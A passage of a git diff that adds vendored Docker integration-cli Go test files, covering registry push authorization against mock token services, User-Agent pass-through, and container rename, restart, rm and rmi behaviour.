c.Assert(out, check.Not(checker.Contains), "Retrying") + c.Assert(out, checker.Contains, "no basic auth credentials") +} + +// This may be flaky but it's needed not to regress on unauthorized push, see #21054 +func (s *DockerSuite) TestPushToCentralRegistryUnauthorized(c *check.C) { + testRequires(c, Network) + repoName := "test/busybox" + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "Retrying") +} + +func getTestTokenService(status int, body string, retries int) *httptest.Server { + var mu sync.Mutex + return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + mu.Lock() + if retries > 0 { + w.WriteHeader(http.StatusServiceUnavailable) + w.Header().Set("Content-Type", "application/json") + w.Write([]byte(`{"errors":[{"code":"UNAVAILABLE","message":"cannot create token at this time"}]}`)) + retries-- + } else { + w.WriteHeader(status) + w.Header().Set("Content-Type", "application/json") + w.Write([]byte(body)) + } + mu.Unlock() + })) +} + +func (s *DockerRegistryAuthTokenSuite) TestPushTokenServiceUnauthResponse(c *check.C) { + ts := getTestTokenService(http.StatusUnauthorized, `{"errors": [{"Code":"UNAUTHORIZED", "message": "a message", "detail": null}]}`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + c.Assert(out, checker.Contains, "unauthorized: a message") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnauthorized(c *check.C) { + ts := getTestTokenService(http.StatusUnauthorized, `{"error": "unauthorized"}`, 0) + defer ts.Close() + 
s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "unauthorized: authentication required") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) { + ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Retrying") + c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnparsable(c *check.C) { + ts := getTestTokenService(http.StatusForbidden, `no way`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], checker.Contains, "error parsing HTTP 403 response body: ") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseNoToken(c *check.C) { + ts := getTestTokenService(http.StatusOK, `{"something": "wrong"}`, 0) + defer ts.Close() 
+ s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "authorization server did not include a token in the response") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go new file mode 100644 index 0000000000..fb9a66a541 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go @@ -0,0 +1,120 @@ +package main + +import ( + "fmt" + "net/http" + "regexp" + + "github.com/go-check/check" +) + +// unescapeBackslashSemicolonParens unescapes \;() +func unescapeBackslashSemicolonParens(s string) string { + re := regexp.MustCompile(`\\;`) + ret := re.ReplaceAll([]byte(s), []byte(";")) + + re = regexp.MustCompile(`\\\(`) + ret = re.ReplaceAll([]byte(ret), []byte("(")) + + re = regexp.MustCompile(`\\\)`) + ret = re.ReplaceAll([]byte(ret), []byte(")")) + + re = regexp.MustCompile(`\\\\`) + ret = re.ReplaceAll([]byte(ret), []byte(`\`)) + + return string(ret) +} + +func regexpCheckUA(c *check.C, ua string) { + re := regexp.MustCompile("(?P.+) UpstreamClient(?P.+)") + substrArr := re.FindStringSubmatch(ua) + + c.Assert(substrArr, check.HasLen, 3, check.Commentf("Expected 'UpstreamClient()' with upstream client UA")) + dockerUA := substrArr[1] + upstreamUAEscaped := substrArr[2] + + // check dockerUA looks correct + reDockerUA := regexp.MustCompile("^docker/[0-9A-Za-z+]") + bMatchDockerUA := reDockerUA.MatchString(dockerUA) + c.Assert(bMatchDockerUA, check.Equals, true, check.Commentf("Docker Engine User-Agent malformed")) + + // check upstreamUA looks correct + 
// Expecting something like: Docker-Client/1.11.0-dev (linux) + upstreamUA := unescapeBackslashSemicolonParens(upstreamUAEscaped) + reUpstreamUA := regexp.MustCompile("^\\(Docker-Client/[0-9A-Za-z+]") + bMatchUpstreamUA := reUpstreamUA.MatchString(upstreamUA) + c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed")) +} + +func registerUserAgentHandler(reg *testRegistry, result *string) { + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(404) + var ua string + for k, v := range r.Header { + if k == "User-Agent" { + ua = v[0] + } + } + *result = ua + }) +} + +// TestUserAgentPassThrough verifies that when an image is pulled from +// a registry, the registry should see a User-Agent string of the form +// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA]) +func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) { + var ( + buildUA string + pullUA string + pushUA string + loginUA string + ) + + buildReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(buildReg, &buildUA) + buildRepoName := fmt.Sprintf("%s/busybox", buildReg.hostport) + + pullReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(pullReg, &pullUA) + pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport) + + pushReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(pushReg, &pushUA) + pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport) + + loginReg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + registerUserAgentHandler(loginReg, &loginUA) + + err = s.d.Start( + "--insecure-registry", buildReg.hostport, + "--insecure-registry", pullReg.hostport, + "--insecure-registry", pushReg.hostport, + "--insecure-registry", loginReg.hostport, + "--disable-legacy-registry=true") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", 
buildRepoName)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup1() + s.d.Cmd("build", "--file", dockerfileName, ".") + regexpCheckUA(c, buildUA) + + s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport) + regexpCheckUA(c, loginUA) + + s.d.Cmd("pull", pullRepoName) + regexpCheckUA(c, pullUA) + + dockerfileName, cleanup2, err := makefile(`FROM scratch + ENV foo bar`) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup2() + s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".") + + s.d.Cmd("push", pushRepoName) + regexpCheckUA(c, pushUA) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go new file mode 100644 index 0000000000..373d614b5e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go @@ -0,0 +1,138 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + cleanedContainerID := strings.TrimSpace(out) + dockerCmd(c, "wait", cleanedContainerID) + + name := inspectField(c, cleanedContainerID, "Name") + newName := "new_name" + stringid.GenerateNonCryptoID() + dockerCmd(c, "rename", "first_name", newName) + + name = inspectField(c, cleanedContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) + +} + +func (s *DockerSuite) TestRenameRunningContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + newName := "new_name" + 
stringid.GenerateNonCryptoID() + cleanedContainerID := strings.TrimSpace(out) + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, cleanedContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) +} + +func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) { + out, _ := runSleepingContainer(c, "--name", "first_name") + c.Assert(waitRun("first_name"), check.IsNil) + + newName := "new_name" + ContainerID := strings.TrimSpace(out) + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, ContainerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) + + out, _ = runSleepingContainer(c, "--name", "first_name") + c.Assert(waitRun("first_name"), check.IsNil) + newContainerID := strings.TrimSpace(out) + name = inspectField(c, newContainerID, "Name") + c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name")) +} + +func (s *DockerSuite) TestRenameCheckNames(c *check.C) { + dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") + + newName := "new_name" + stringid.GenerateNonCryptoID() + dockerCmd(c, "rename", "first_name", newName) + + name := inspectField(c, newName, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) + + result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "No such container: first_name", + }) +} + +func (s *DockerSuite) TestRenameInvalidName(c *check.C) { + runSleepingContainer(c, "--name", "myname") + + out, _, err := dockerCmdWithError("rename", "myname", "new:invalid") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err)) + + 
out, _, err = dockerCmdWithError("rename", "myname") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", "myname", "") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) + c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", "", "newname") + c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out)) + c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) + + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out)) +} + +func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "network", "create", "network1") + out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top") + + anonymousContainerID := strings.TrimSpace(out) + + dockerCmd(c, "rename", anonymousContainerID, "container1") + dockerCmd(c, "start", "container1") + + count := "-c" + if daemonPlatform == "windows" { + count = "-n" + } + + _, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1") + c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails after renaming anonymous container: %v", err)) +} + +func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) { + out, _ := runSleepingContainer(c, "--name", "old") + ContainerID := strings.TrimSpace(out) + + out, _, err := dockerCmdWithError("rename", "old", "old") + c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) + c.Assert(out, checker.Contains, "Renaming a 
container with the same name", check.Commentf("%v", err)) + + out, _, err = dockerCmdWithError("rename", ContainerID, "old") + c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) + c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) +} + +// Test case for #23973 +func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top") + dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top") + dockerCmd(c, "rename", "app1", "app2") + out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go new file mode 100644 index 0000000000..7d585289eb --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go @@ -0,0 +1,278 @@ +package main + +import ( + "os" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { + dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar") + cleanedContainerID, err := getIDByName("test") + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\n") + + dockerCmd(c, "restart", cleanedContainerID) + + // Wait until the container has stopped + err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\nfoobar\n") +} + +func (s 
*DockerSuite) TestRestartRunningContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo foobar && sleep 30 && echo 'should not print this'") + + cleanedContainerID := strings.TrimSpace(out) + + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + c.Assert(out, checker.Equals, "foobar\n") + + dockerCmd(c, "restart", "-t", "1", cleanedContainerID) + + out, _ = dockerCmd(c, "logs", cleanedContainerID) + + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + c.Assert(out, checker.Equals, "foobar\nfoobar\n") +} + +// Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819. +func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") + + cleanedContainerID := strings.TrimSpace(out) + out, err := inspectFilter(cleanedContainerID, "len .Mounts") + c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out)) + out = strings.Trim(out, " \n\r") + c.Assert(out, checker.Equals, "1") + + source, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "restart", cleanedContainerID) + + out, err = inspectFilter(cleanedContainerID, "len .Mounts") + c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out)) + out = strings.Trim(out, " \n\r") + c.Assert(out, checker.Equals, "1") + + sourceAfterRestart, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test") + c.Assert(err, checker.IsNil) + c.Assert(source, checker.Equals, sourceAfterRestart) +} + +func (s *DockerSuite) TestRestartPolicyNO(c *check.C) { + out, _ := dockerCmd(c, "create", "--restart=no", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, 
"HostConfig.RestartPolicy.Name") + c.Assert(name, checker.Equals, "no") +} + +func (s *DockerSuite) TestRestartPolicyAlways(c *check.C) { + out, _ := dockerCmd(c, "create", "--restart=always", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, "HostConfig.RestartPolicy.Name") + c.Assert(name, checker.Equals, "always") + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + // MaximumRetryCount=0 if the restart policy is always + c.Assert(MaximumRetryCount, checker.Equals, "0") +} + +func (s *DockerSuite) TestRestartPolicyOnFailure(c *check.C) { + out, _, err := dockerCmdWithError("create", "--restart=on-failure:-1", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "maximum retry count cannot be negative") + + out, _ = dockerCmd(c, "create", "--restart=on-failure:1", "busybox") + + id := strings.TrimSpace(string(out)) + name := inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "1") + + out, _ = dockerCmd(c, "create", "--restart=on-failure:0", "busybox") + + id = strings.TrimSpace(string(out)) + name = inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "0") + + out, _ = dockerCmd(c, "create", "--restart=on-failure", "busybox") + + id = strings.TrimSpace(string(out)) + name = inspectField(c, id, "HostConfig.RestartPolicy.Name") + maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + + c.Assert(name, checker.Equals, "on-failure") + c.Assert(maxRetry, checker.Equals, "0") +} + +// a good container with --restart=on-failure:3 +// MaximumRetryCount!=0; RestartCount=0 +func (s *DockerSuite) 
TestRestartContainerwithGoodContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "true") + + id := strings.TrimSpace(string(out)) + err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", 30*time.Second) + c.Assert(err, checker.IsNil) + + count := inspectField(c, id, "RestartCount") + c.Assert(count, checker.Equals, "0") + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + c.Assert(MaximumRetryCount, checker.Equals, "3") + +} + +func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c, "-d", "--restart=always") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + pidStr := inspectField(c, id, "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) { + // TODO Windows. This may be portable following HNS integration post TP5. 
+ testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udNet") + + dockerCmd(c, "run", "-d", "--net=udNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--restart=always", "--net=udNet", "--name=second", + "--link=first:foo", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Now kill the second container and let the restart policy kick in + pidStr := inspectField(c, "second", "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect("second", "{{.RestartCount}}", "1", 5*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect("second", "{{.State.Status}}", "running", 5*time.Second) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c, "-d", "--restart=always") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + dockerCmd(c, "restart", id) + + c.Assert(waitRun(id), check.IsNil) + + pidStr := inspectField(c, id, "State.Pid") + + pid, err := strconv.Atoi(pidStr) + c.Assert(err, check.IsNil) + + p, err := os.FindProcess(pid) + c.Assert(err, check.IsNil) + c.Assert(p, check.NotNil) + + err = 
p.Kill() + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, check.IsNil) + + err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { + out1, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") + out2, _ := dockerCmd(c, "run", "-d", "--restart=always", "busybox", "false") + + id1 := strings.TrimSpace(string(out1)) + id2 := strings.TrimSpace(string(out2)) + waitTimeout := 15 * time.Second + if daemonPlatform == "windows" { + waitTimeout = 150 * time.Second + } + err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "restart", id1) + dockerCmd(c, "restart", id2) + + dockerCmd(c, "stop", id1) + dockerCmd(c, "stop", id2) + dockerCmd(c, "start", id1) + dockerCmd(c, "start", id2) +} + +func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { + out, _ := runSleepingContainer(c, "--rm") + + id := strings.TrimSpace(string(out)) + dockerCmd(c, "restart", id) + err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "ps") + c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go new file mode 100644 index 0000000000..0186c56741 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go @@ -0,0 +1,86 @@ +package main + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) { + testRequires(c, 
SameHostDaemon) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true") + + err = os.RemoveAll(tempDir) + c.Assert(err, check.IsNil) + + dockerCmd(c, "rm", "-v", "losemyvolumes") +} + +func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true") + + dockerCmd(c, "rm", "-v", "foo") +} + +func (s *DockerSuite) TestRmContainerRunning(c *check.C) { + createRunningContainer(c, "foo") + + _, _, err := dockerCmdWithError("rm", "foo") + c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container")) +} + +func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) { + createRunningContainer(c, "foo") + + // Stop then remove with -s + dockerCmd(c, "rm", "-f", "foo") +} + +func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) { + dockerfile1 := `FROM busybox:latest + ENTRYPOINT ["true"]` + img := "test-container-orphaning" + dockerfile2 := `FROM busybox:latest + ENTRYPOINT ["true"] + MAINTAINER Integration Tests` + + // build first dockerfile + img1, err := buildImage(img, dockerfile1, true) + c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img)) + // run container on first image + dockerCmd(c, "run", img) + // rebuild dockerfile with a small addition at the end + _, err = buildImage(img, dockerfile2, true) + c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img)) + // try to remove the image, should not error out. 
+ out, _, err := dockerCmdWithError("rmi", img) + c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out)) + + // check if we deleted the first image + out, _ = dockerCmd(c, "images", "-q", "--no-trunc") + c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out)) + +} + +func (s *DockerSuite) TestRmInvalidContainer(c *check.C) { + out, _, err := dockerCmdWithError("rm", "unknown") + c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none")) + c.Assert(out, checker.Contains, "No such container") +} + +func createRunningContainer(c *check.C, name string) { + runSleepingContainer(c, "-dt", "--name", name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go new file mode 100644 index 0000000000..cb16d9d88c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go @@ -0,0 +1,352 @@ +package main + +import ( + "fmt" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) { + errSubstr := "is using it" + + // create a container + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + // try to delete the image + out, _, err := dockerCmdWithError("rmi", "busybox") + // Container is using image, should not be able to rmi + c.Assert(err, checker.NotNil) + // Container is using image, error message should contain errSubstr + c.Assert(out, checker.Contains, errSubstr, check.Commentf("Container: %q", cleanedContainerID)) + + // make sure it didn't delete the busybox name + images, _ := dockerCmd(c, "images") + // The name 'busybox' should not have been removed from images + 
c.Assert(images, checker.Contains, "busybox") +} + +func (s *DockerSuite) TestRmiTag(c *check.C) { + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox", "utest:tag1") + dockerCmd(c, "tag", "busybox", "utest/docker:tag2") + dockerCmd(c, "tag", "busybox", "utest:5000/docker:tag3") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+3, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + dockerCmd(c, "rmi", "utest/docker:tag2") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + dockerCmd(c, "rmi", "utest:5000/docker:tag3") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+1, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + + } + dockerCmd(c, "rmi", "utest:tag1") + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n"), check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + + } +} + +func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'") + + containerID := strings.TrimSpace(out) + + // Wait for it to exit as cannot commit a running container on Windows, and + // it will take a few seconds to exit + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "commit", containerID, "busybox-one") + + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") + dockerCmd(c, "tag", "busybox-one", 
